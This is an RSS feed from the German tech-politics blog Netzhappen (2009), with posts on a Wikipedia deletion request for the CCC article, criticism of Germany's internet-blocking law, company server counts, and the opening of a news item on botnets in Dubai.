<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2germanfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Netzhappen</title>
	
	<link>http://netzhappen.de</link>
	<description>news aus der digitalen netzwelt</description>
	<lastBuildDate>Fri, 04 Dec 2009 21:15:05 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.6</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/Netzhappen" /><feedburner:info uri="netzhappen" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:feedFlare href="http://add.my.yahoo.com/content?lg=de&amp;url=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://us.i1.yimg.com/us.yimg.com/i/de/my/addtomyyahoo4.gif">Subscribe with Mein Yahoo!</feedburner:feedFlare><feedburner:feedFlare href="http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.newsgator.com/images/ngsub1.gif">Subscribe with NewsGator</feedburner:feedFlare><feedburner:feedFlare href="http://www.bloglines.com/sub/http://feeds.feedburner.com/Netzhappen" src="http://www.bloglines.com/images/sub_modern11.gif">Subscribe with Bloglines</feedburner:feedFlare><feedburner:feedFlare href="http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.netvibes.com/img/add2netvibes.gif">Subscribe with Netvibes</feedburner:feedFlare><feedburner:feedFlare href="http://fusion.google.com/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://buttons.googlesyndication.com/fusion/add.gif">Subscribe with Google</feedburner:feedFlare><feedburner:feedFlare href="http://www.pageflakes.com/subscribe.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.pageflakes.com/ImageFile.ashx?instanceId=Static_4&amp;fileName=ATP_blu_91x17.gif">Subscribe with Pageflakes</feedburner:feedFlare><feedburner:feedFlare href="http://www.plusmo.com/add?url=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://plusmo.com/res/graphics/fbplusmo.gif">Subscribe with Plusmo</feedburner:feedFlare><feedburner:feedFlare href="http://www.thefreedictionary.com/_/hp/AddRSS.aspx?http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://img.tfd.com/hp/addToTheFreeDictionary.gif">Subscribe with The Free Dictionary</feedburner:feedFlare><feedburner:feedFlare href="http://www.bitty.com/manual/?contenttype=rssfeed&amp;contentvalue=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.bitty.com/img/bittychicklet_91x17.gif">Subscribe with Bitty Browser</feedburner:feedFlare><feedburner:feedFlare href="http://www.newsalloy.com/?rss=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.newsalloy.com/subrss3.gif">Subscribe with NewsAlloy</feedburner:feedFlare><feedburner:feedFlare href="http://www.live.com/?add=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://tkfiles.storage.msn.com/x1piYkpqHC_35nIp1gLE68-wvzLZO8iXl_JMledmJQXP-XTBOLfmQv4zhj4MhcWEJh_GtoBIiAl1Mjh-ndp9k47If7hTaFno0mxW9_i3p_5qQw">Subscribe with Live.com</feedburner:feedFlare><feedburner:feedFlare href="http://mix.excite.eu/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://image.excite.co.uk/mix/addtomix.gif">Subscribe with Excite MIX</feedburner:feedFlare><feedburner:feedFlare href="http://www.yourminis.com/subscribe.aspx?u=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.yourminis.com/images/addtoyourminisbadge.gif">Subscribe with Yourminis.com</feedburner:feedFlare><feedburner:feedFlare href="http://download.attensa.com/app/get_attensa.html?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.attensa.com/blogs/attensa/WindowsLiveWriter/BadgeredintoBadges_10C02/attensa_feed_button5.gif">Subscribe with Attensa for Outlook</feedburner:feedFlare><feedburner:feedFlare href="http://www.webwag.com/wwgthis.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.webwag.com/images/wwgthis.gif">Subscribe with Webwag</feedburner:feedFlare><feedburner:feedFlare href="http://hub.netomat.net/account/account.autoSubscribe.jspa?urls=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.netomat.net/blogger/images/icon_netomat_feedbutton.gif">Subscribe with netomat Hub</feedburner:feedFlare><feedburner:feedFlare href="http://www.podcastready.com/oneclick_bookmark.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.podcastready.com/images/podcastready_button.gif">Subscribe with Podcast Ready</feedburner:feedFlare><feedburner:feedFlare href="http://www.flurry.com/pushRssFeed.do?r=fb&amp;url=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.flurry.com/images/flurry_rss_logo2.gif">Subscribe with Flurry</feedburner:feedFlare><feedburner:feedFlare href="http://www.wikio.com/subscribe?url=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.wikio.com/shared/img/add2wikio.gif">Subscribe with Wikio</feedburner:feedFlare><feedburner:feedFlare href="http://www.dailyrotation.com/index.php?feed=http%3A%2F%2Ffeeds.feedburner.com%2FNetzhappen" src="http://www.dailyrotation.com/rss-dr2.gif">Subscribe with Daily Rotation</feedburner:feedFlare><item>
		<title>Wikipedia, Löschanträge und der CCC</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/bM6HEb4Mrvg/</link>
		<comments>http://netzhappen.de/2009/11/11/wikipedia-loschantrage-und-der-ccc/#comments</comments>
		<pubDate>Wed, 11 Nov 2009 20:29:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzpolitik]]></category>
		<category><![CDATA[la]]></category>
		<category><![CDATA[löschantrag]]></category>
		<category><![CDATA[wb]]></category>
		<category><![CDATA[wikipedia]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1586</guid>
		<description><![CDATA[Zum aktuellen Stand der Dinge zum Thema Löschanträge hier das, inzwischen schon revidierte, aktuelle Zwischenergebnis:

Löschkandidaten/12. November  2009
Chaos_Computer_Club
Wer Wikipedia kritisiert hat keine Erwähnung verdient. &#8212; WB 19:28, 11. Nov. 2009 (CET)
Wem da wohl zuviel Weissbier in den Kopf gefahren ist?
Quelle
Copyright &#169; 2009 Creative Commons (by-sa 3.0 de) This feed is for personal, non-commercial use only. [...]]]></description>
			<content:encoded><![CDATA[<p>Zum aktuellen Stand der Dinge zum Thema Löschanträge hier das, inzwischen schon revidierte, aktuelle Zwischenergebnis:</p>
<blockquote>
<h2 id="firstHeading">Löschkandidaten/12. November  2009</h2>
<h3><span id="Chaos_Computer_Club"><a title="Chaos  Computer Club" href="http://de.wikipedia.org/wiki/Chaos_Computer_Club">Chaos_Computer_Club</a></span></h3>
<p>Wer Wikipedia kritisiert hat keine Erwähnung verdient. &#8212; <a title="Benutzer:Weissbier" href="http://de.wikipedia.org/wiki/Benutzer:Weissbier">WB</a> 19:28, 11. Nov. 2009 (CET)</p></blockquote>
<p>Wem da wohl zuviel Weissbier in den Kopf gefahren ist?</p>
<p><a href="http://de.wikipedia.org/w/index.php?title=Wikipedia:L%C3%B6schkandidaten/12._November_2009&amp;oldid=66697726">Quelle</a></p>
<hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/fAMSy66ey5OdiuaNpGjkW9ScckU/0/da"><img src="http://feedads.g.doubleclick.net/~a/fAMSy66ey5OdiuaNpGjkW9ScckU/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/fAMSy66ey5OdiuaNpGjkW9ScckU/1/da"><img src="http://feedads.g.doubleclick.net/~a/fAMSy66ey5OdiuaNpGjkW9ScckU/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/bM6HEb4Mrvg" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/11/11/wikipedia-loschantrage-und-der-ccc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/11/11/wikipedia-loschantrage-und-der-ccc/</feedburner:origLink></item>
		<item>
		<title>Lebenszeichen</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/sQz2CHqDtWQ/</link>
		<comments>http://netzhappen.de/2009/11/05/lebenszeichen/#comments</comments>
		<pubDate>Thu, 05 Nov 2009 14:34:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzhappen]]></category>

		<guid isPermaLink="false">http://netzhappen.de/2009/11/05/lebenszeichen/</guid>
		<description><![CDATA[Das Blog lag nun sehr lange brach und wird wohl in der nächsten Zeit wieder reaktiviert.
Copyright &#169; 2009 Creative Commons (by-sa 3.0 de) This feed is for personal, non-commercial use only.  The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page [...]]]></description>
			<content:encoded><![CDATA[<p>Das Blog lag nun sehr lange brach und wird wohl in der nächsten Zeit wieder reaktiviert.</p>
<hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/900cL1mai2T9472zgQBzq7QH2uE/0/da"><img src="http://feedads.g.doubleclick.net/~a/900cL1mai2T9472zgQBzq7QH2uE/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/900cL1mai2T9472zgQBzq7QH2uE/1/da"><img src="http://feedads.g.doubleclick.net/~a/900cL1mai2T9472zgQBzq7QH2uE/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/sQz2CHqDtWQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/11/05/lebenszeichen/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/11/05/lebenszeichen/</feedburner:origLink></item>
		<item>
		<title>Netzsperren und andere Sauereien</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/SQfSA0dfmKM/</link>
		<comments>http://netzhappen.de/2009/06/17/netzsperren-und-andere-sauereien/#comments</comments>
		<pubDate>Tue, 16 Jun 2009 22:13:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[1984]]></category>
		<category><![CDATA[Netzhappen]]></category>
		<category><![CDATA[Netzpolitik]]></category>
		<category><![CDATA[cdu]]></category>
		<category><![CDATA[martin dörmann]]></category>
		<category><![CDATA[netzsperre]]></category>
		<category><![CDATA[SPD]]></category>
		<category><![CDATA[zensur]]></category>
		<category><![CDATA[zensursula]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1579</guid>
		<description><![CDATA[Tja, nun ist es soweit. Die beiden Volksparteien CDU und SPD haben sich auf das umstrittene Spezialgesetz geeinigt, mit dessen Hilfe sie Kinderpornographie im Internet bekämpfen und zufällige Besucher solcher Seiten vor dem &#8220;anfixen&#8221; bewahren wollen. Und wie erwartet ist die Reaktion der Internet-Community heftig. Von Wut bis Trauer, von Verachtung bis Ratlosigkeit reicht die [...]]]></description>
			<content:encoded><![CDATA[<p>Tja, nun ist es soweit. Die beiden <span style="text-decoration: line-through;">Volks</span>parteien CDU und SPD haben sich auf das umstrittene Spezialgesetz geeinigt, mit dessen Hilfe sie Kinderpornographie im Internet bekämpfen und zufällige Besucher solcher Seiten vor dem &#8220;anfixen&#8221; bewahren wollen. Und wie erwartet ist die Reaktion der Internet-Community heftig. Von Wut bis Trauer, von Verachtung bis Ratlosigkeit reicht die Palette der inzwischen völlig entnervten Front der Gegner dieser Sperren. Und völlig zu Recht lehnen der Chaos Computer Club (<a href="http://ccc.de/">CCC</a>) und der Arbeitskreis Zensur (<a href="http://ak-zensur.de/2009/06/zensur-beschlossen-brief.html">AK Zensur</a>) <a href="http://netzpolitik.org/2009/community-sagt-alle-weiteren-gespraeche-mit-spd-verhandlungsfuehrer-ab/">jede weitere Unterredung mit der SPD ab</a>. Was haben sie sich den Mund fusselig geredet, nur um zum Schluss mit völliger Ignoranz abgewatscht zu werden. Da kommt dann nämlich ein Herr Martin Dörmann, der  SPD Verhandlungsführer, daher und behauptet:</p>
<blockquote><p>Wir haben alles im Interesse der Internetnutzer getan und alle  wesentlichen Bedenken des Bundesrates und der Internet-Community  aufgegriffen.</p></blockquote>
<p>Für solche Aussagen habe ich nur noch Verachtung übrig. Enttäuschung weniger, dafür hat sich das die letzten Monaten viel zu sehr angedeutet. Das was Herr Dörmann von sich gibt kann bestenfalls als <span style="text-decoration: line-through;">Lüge</span> Wahrnehmungsstörung bezeichnet werden.</p>
<p>Und die Presse? Sie spricht die Einigung innerhalb der Großen Koalition an und verweist auf die empörten Reaktionen und spricht von Frust innerhalb der Netzgemeinde. Das mag im ersten Moment vielleicht stimmen, aber insgeheim regiert doch die geballte Faust in der Hosentasche. Hier wurde eben nicht die Gruppe der Politikverdrossenen geprellt, sondern die, welche noch aktiv eingreifen wollen. Aber damit ist nun Schluss, CDU und SPD haben sich selbst abgewandt von uns und gezeigt wie egal ihnen die Meinung von Zehntausenden sind. Leider wird dies in den Medien nicht so hervorgehoben &#8211; ach was heisst leider &#8211; wie erwartet wird es nicht von den Redaktionen der Print- und Funkmedien thematisiert.</p>
<p>Nachdem nun also der erste erwartete Schreck vorbei ist, freue ich mich sogar ein wenig. Durch den gestrigen Tag wird sich nun ein weiterer Teil der Bevölkerung von den etablierten Parteien abwenden und mit freudiger Erwartung sehne ich den Wahlabend daher, nur um im Anschluss die lustigen Erklärungsversuche für die geringe Wahlbeteiligung bzw. das Wahlergebnis zu hören und zu lesen.</p>
<p>Ach ja, CDU und SPD haben nebenbei auch <a href="http://netzpolitik.org/2009/datenschutznovelle-spd-faellt-mal-wieder-um/">die Novelle des Bundesdatenschutzgesetzes so weichgeklopft</a> das der Handel und Weiterverkauf von Adressen weiter ohne Probleme möglich ist. Ein dreifaches Hoch auf den Wirtschaftslobbyismus und seine Schattenvertreter im Bundestag.</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/02/03/netzsperre-fur-frankreichs-internetbeauftragte/" rel="bookmark" title="Permanent Link: Netzsperre für Frankreichs Internetbeauftragte">Netzsperre für Frankreichs Internetbeauftragte</a></li><li><a href="http://netzhappen.de/2009/02/27/australiens-great-firewall-plane-vorerst-gescheitert/" rel="bookmark" title="Permanent Link: Australiens &#8216;Great Firewall&#8217; Pläne vorerst gescheitert?">Australiens &#8216;Great Firewall&#8217; Pläne vorerst gescheitert?</a></li><li><a href="http://netzhappen.de/2008/11/16/bka-gesetz-droht-im-bundrat-zu-scheitern/" rel="bookmark" title="Permanent Link: BKA-Gesetz droht im Bundesrat zu scheitern">BKA-Gesetz droht im Bundesrat zu scheitern</a></li><li><a href="http://netzhappen.de/2009/02/24/googles-doubleclick-verbreitet-wieder-malware/" rel="bookmark" title="Permanent Link: Googles Doubleclick verbreitet (wieder) Malware">Googles Doubleclick verbreitet (wieder) Malware</a></li><li><a href="http://netzhappen.de/2008/12/09/schauble-und-das-sicherheitsnetzwerk/" rel="bookmark" title="Permanent Link: Schäuble und das Sicherheitsnetzwerk">Schäuble und das Sicherheitsnetzwerk</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/_NvUOQUPYJWy4mrG5qBPoZCYrTA/0/da"><img src="http://feedads.g.doubleclick.net/~a/_NvUOQUPYJWy4mrG5qBPoZCYrTA/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/_NvUOQUPYJWy4mrG5qBPoZCYrTA/1/da"><img src="http://feedads.g.doubleclick.net/~a/_NvUOQUPYJWy4mrG5qBPoZCYrTA/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/SQfSA0dfmKM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/06/17/netzsperren-und-andere-sauereien/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/06/17/netzsperren-und-andere-sauereien/</feedburner:origLink></item>
		<item>
		<title>Stopp</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/UAHSmuhtFxM/</link>
		<comments>http://netzhappen.de/2009/06/16/stopp/#comments</comments>
		<pubDate>Tue, 16 Jun 2009 11:36:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[1984]]></category>
		<category><![CDATA[Netzpolitik]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1573</guid>
		<description><![CDATA[
Es ist alles gesagt worden. Diese Volkspartei hat jeglichen Rückhalt in der &#8220;Internet-Community&#8221; verloren und steuert in die netzpolitische Bedeutungslosigkeit. Nun denn..
(Bildquelle: Spreeblick)
Related posts:Die einzig richtige AntwortCopyright &#169; 2009 Creative Commons (by-sa 3.0 de) This feed is for personal, non-commercial use only.  The use of this feed on other websites breaches copyright. If this [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://netzhappen.de/wp-content/uploads/2009/06/spd_stopp2.jpg"><img class="aligncenter size-full wp-image-1574" title="spd_stopp2" src="http://netzhappen.de/wp-content/uploads/2009/06/spd_stopp2.jpg" alt="spd_stopp2" width="500" height="445" /></a><br />
Es ist alles gesagt worden. Diese <span style="text-decoration: line-through;">Volks</span>partei hat jeglichen Rückhalt in der &#8220;Internet-Community&#8221; verloren und steuert in die netzpolitische Bedeutungslosigkeit. Nun denn..</p>
<p>(Bildquelle: <a href="http://www.spreeblick.com">Spreeblick</a>)</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/04/19/die-einzig-richtige-antwort/" rel="bookmark" title="Permanent Link: Die einzig richtige Antwort">Die einzig richtige Antwort</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/XiCKv-OGva6rxqqaaUSS6FoQ8_g/0/da"><img src="http://feedads.g.doubleclick.net/~a/XiCKv-OGva6rxqqaaUSS6FoQ8_g/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/XiCKv-OGva6rxqqaaUSS6FoQ8_g/1/da"><img src="http://feedads.g.doubleclick.net/~a/XiCKv-OGva6rxqqaaUSS6FoQ8_g/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/UAHSmuhtFxM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/06/16/stopp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/06/16/stopp/</feedburner:origLink></item>
		<item>
		<title>Wer hat die meisten Webserver?</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/gnXWiPiqGYU/</link>
		<comments>http://netzhappen.de/2009/05/15/wer-hat-die-meisten-webserver/#comments</comments>
		<pubDate>Fri, 15 May 2009 20:25:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzhappen]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[statistik]]></category>
		<category><![CDATA[unternehmen]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1569</guid>
		<description><![CDATA[Data Center Knowledge hat sich einmal umgeschaut und Provider sowie andere Dienstleister herausgesucht die eine hohe Anzahl an Webservern besitzen. Ausgangspunkt der Studie war der aktuelle Quartalsbericht von Rackspace, die bekanntgaben, dass das Unternehmen seit dem 30. März 50.038 Server besitzen. Ende 2008 waren es noch 47.518. Somit steigt Rackspace in die Topriege der Unternehmen [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.datacenterknowledge.com/archives/2009/05/14/whos-got-the-most-web-servers/">Data Center Knowledge</a> hat sich einmal umgeschaut und Provider sowie andere Dienstleister herausgesucht die eine hohe Anzahl an Webservern besitzen. Ausgangspunkt der Studie war der aktuelle Quartalsbericht von Rackspace, die bekanntgaben, dass das Unternehmen seit dem 30. März 50.038 Server besitzen. Ende 2008 waren es noch 47.518. Somit steigt Rackspace in die Topriege der Unternehmen mit den meisten Servern auf, jedenfalls von den Firmen die öffentlich Auskunft darüber geben wieviel Server sie besitzen. Nur 1&amp;1 Internet hat momentan noch mehr Server, nämlich 55.000. Weitere Zahlen kommen außer von den Unternehmen selbst noch von Netcraft.</p>
<h3>Server Top-Liste der Unternehmen</h3>
<ul>
<li>1&amp;1 Internet: 55.000 Server (Unternehmensdaten)</li>
<li>Rackspace: 50.038 Server (Unternehmensdaten)</li>
<li>The Planet: 48.500 Server (Unternehmensdaten)</li>
<li>Akamai Technologies: 48.000 Server (Unternehmensdaten)</li>
<li>OVH: 40.000 to 55.000 Server (Unternehmensdaten)</li>
<li>SBC Communications: 29.193 Server (Netcraft)</li>
<li>Verizon: 25.788 Server (Netcraft)</li>
<li>Time Warner Cable: 24.817 Server (Netcraft)</li>
<li>SoftLayer: 21.000 server (Unternehmensdaten)</li>
<li>AT&amp;T: 20.268 Server (Netcraft)</li>
<li>Peer1/ServerBeach: 10.277 Server (Unternehmensdaten)</li>
<li>iWeb: 10.000 Server (Unternehmensdaten)</li>
</ul>
<h3>Unternehmen ohne öffentliche Statistiken</h3>
<p>Wie schon geschrieben veröffentlichen nicht alle Unternehmen solche Statistiken und so kann man oftmals nur vermuten wieviel Server sie haben. Teilweise wird dabei aus alten Daten extrapoliert.</p>
<p><strong>Wer hat also noch mehr als 50.000 Server?</strong></p>
<p><strong>Google</strong><br />
Es wird angenommen das Google mindestens 450.000 Server besitzt. Diese Daten sind allerings schon 3 Jahre alt, so dass die aktuelle Zahl weitaus höher sein kann. Zum Vergleich &#8211; Google veröffentlichte erst kürzlich Daten zu einen Rechenzentrum mit mehr als 45.000 Servern.</p>
<p><strong>Microsoft</strong><br />
Aus Screenshots aus einer Management Software für Rechenzentren von Microsoft kann man auf eine Zahl von mindestens 218.000 Server schließen. Allerdings sind auch diese Daten leicht veraltet und von Mitte 2008. Das neue Rechenzentrum von Microsoft in Chicago wird bis zu 300.000 Server beinhalten und sobald dieses in Betrieb genommen wird, wird sich die Gesamtzahl massiv erhöhen.</p>
<p><strong>Amazon</strong><br />
Es gibt kaum Zahlen zur Serveranzahl von Amazon. allerdings lässt die Tatsache, dass das Unternehmen den weltgrößten Onlineshops sowie eines der größten Cloud-Computing Netzwerke betreibt auf eine sehr größe Serverzahl schließen. Im Jahr 2008 kaufte Amazon Server im wert von 86 Millionen Dollar.</p>
<p><strong>eBay</strong><br />
Mit 160 Millionen Nutzern des Aktionshauses und Paypal sowie 443 Millionen Skype Nutzern braucht es eine große Serverzahl. Allein die riesige Menge an Daten, welche bei rund 8.5 Petabytes liegt, läßt vermuten das auch eBay mehr als 50.000 Server besitzt.</p>
<p><strong>Yahoo</strong><br />
Das nach Google und Microsoft drittgrößte Suchportal ist ehr wahrscheinlich im Club der über 50.000 Server Unternehmen.</p>
<p><strong>GoDaddy</strong><br />
Der weltgrößte Domainregistrar mit 35 Millionen Domains unter ihrer Verwaltung und einer der größten Shared Hosting Unternehmen ist möglicherweise in den gleichen Größenordnungen wie 1&amp;1 Internet zu finden.</p>
<p><strong>IBM</strong><br />
Mit mehr als 743.000 Quadratmeter Platz in Rechenzentren kann IBM auf eine riesige Anzahl an Server zurückgreifen. Genaue Zahlen sind allerdings nicht bekannt.</p>
<p><strong>Facebook</strong><br />
Facebook hat mehr als 10.000 Server, allerdings sind diese Zahlen von April 2008 und sollten seit dem stark gestiegen sein.</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/01/22/internet-statistik-2008/" rel="bookmark" title="Permanent Link: Internet Statistik 2008">Internet Statistik 2008</a></li><li><a href="http://netzhappen.de/2009/03/04/ddos-angriffe-auf-bekannte-russische-gay-webseiten/" rel="bookmark" title="Permanent Link: DDos Angriffe auf bekannte russische Gay Webseiten">DDos Angriffe auf bekannte russische Gay Webseiten</a></li><li><a href="http://netzhappen.de/2009/02/03/twitters-eigener-slashdot-effekt-crasht-webseiten/" rel="bookmark" title="Permanent Link: Twitters eigener Slashdot-Effekt crasht Webseiten">Twitters eigener Slashdot-Effekt crasht Webseiten</a></li><li><a href="http://netzhappen.de/2009/05/15/dubai-hauptstadt-der-botnetze-in-nahost/" rel="bookmark" title="Permanent Link: Dubai, Hauptstadt der Botnetze in Nahost">Dubai, Hauptstadt der Botnetze in Nahost</a></li><li><a href="http://netzhappen.de/2009/01/29/ddos-lahmt-kirgistan-teil-2/" rel="bookmark" title="Permanent Link: DDoS lähmt Kirgistan &#8211; Teil 2">DDoS lähmt Kirgistan &#8211; Teil 2</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/uYqKNotZmjxcla4ml7rniFNvjWY/0/da"><img src="http://feedads.g.doubleclick.net/~a/uYqKNotZmjxcla4ml7rniFNvjWY/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/uYqKNotZmjxcla4ml7rniFNvjWY/1/da"><img src="http://feedads.g.doubleclick.net/~a/uYqKNotZmjxcla4ml7rniFNvjWY/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/gnXWiPiqGYU" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/05/15/wer-hat-die-meisten-webserver/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/05/15/wer-hat-die-meisten-webserver/</feedburner:origLink></item>
		<item>
		<title>Dubai, Hauptstadt der Botnetze in Nahost</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/BGA0t0Q3m1Q/</link>
		<comments>http://netzhappen.de/2009/05/15/dubai-hauptstadt-der-botnetze-in-nahost/#comments</comments>
		<pubDate>Fri, 15 May 2009 10:37:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzsicherheit]]></category>
		<category><![CDATA[botnet]]></category>
		<category><![CDATA[botnetz]]></category>
		<category><![CDATA[dubai]]></category>
		<category><![CDATA[nahost]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1567</guid>
		<description><![CDATA[Nach Meldungen von Symantec ist Dubai die Stadt mit der höchsten Anzahl von Botnetze im Nahen Osten. Botnetze sind Netzwerke von meist böswillig übernommenen Computern, welche oft von Spammern genutzt werden um Spam oder Malware zu verbreiten. Nach einem Bericht im letzten Internet Security Threat Report wurden im Jahr 2008 in Nahost 644.126 einzelne mit [...]]]></description>
			<content:encoded><![CDATA[<p>Nach Meldungen von Symantec ist Dubai die Stadt mit der höchsten Anzahl von Botnetze im Nahen Osten. Botnetze sind Netzwerke von meist böswillig übernommenen Computern, welche oft von Spammern genutzt werden um Spam oder Malware zu verbreiten. Nach einem Bericht im letzten Internet Security Threat Report wurden im Jahr 2008 in Nahost 644.126 einzelne mit infizierte Rechner gehostet die Teil von Botnetzen waren. Dabei waren über das Jahr gerechnet im Schnitt 5.743 pro Tag befallen. Dubai, Millionenstadt im gleichnamigen Emirat, war verantwortlich für 6% der betroffenen Rechner und macht die Stadt damit zum am meisten beeinträchtigten Platz in der Region.</p>
